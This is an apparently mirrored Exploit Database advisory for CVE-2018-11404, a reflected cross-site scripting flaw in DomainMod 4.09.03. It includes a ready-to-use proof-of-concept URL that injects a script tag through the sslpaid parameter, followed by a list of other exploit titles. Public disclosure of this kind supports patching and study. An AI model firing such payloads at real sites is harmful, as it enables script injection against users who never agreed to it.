DomainMod 4.09.03 – ‘sslpaid’ Cross-Site Scripting

Exploit Database
117 阅读

作者： longer

日期： 2018-05-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44783/

# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter
# Date: 2018-05-28
# Exploit Author: longer（76439392@qq.com）
# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03
# CVE : CVE-2018-11404
 
An issue was discovered in DomainMod v4.09.03.（https://github.com/domainmod/domainmod/issues/63）
After the user logged in, open the url:
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

last Exploits
DomainMod 4.09.03 – ‘sslpaid’ Cross-Site Scripting的更多信息

Joomla! Component com_tienda – ‘categoria’ Cross-Site Scripting：
LIOOSYS CMS – ‘news.php’ SQL Injection：
YeaLink IP Phone SIP-TxxP Firmware 9.70.0.100 – Multiple Vulnerabilities：
Boelter Blue System Management 1.3 – SQL Injection：
Xhibiter NFT Marketplace 1.10.2 – SQL Injection：
pragmaMx 1.12.1 – ‘/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url’ Cross-Site Scripting：
Mailing List Manager Pro 3.0 – SQL Injection：
bbPress 1.0.2 – Cross-Site Request Forgery (Change Admin Password)：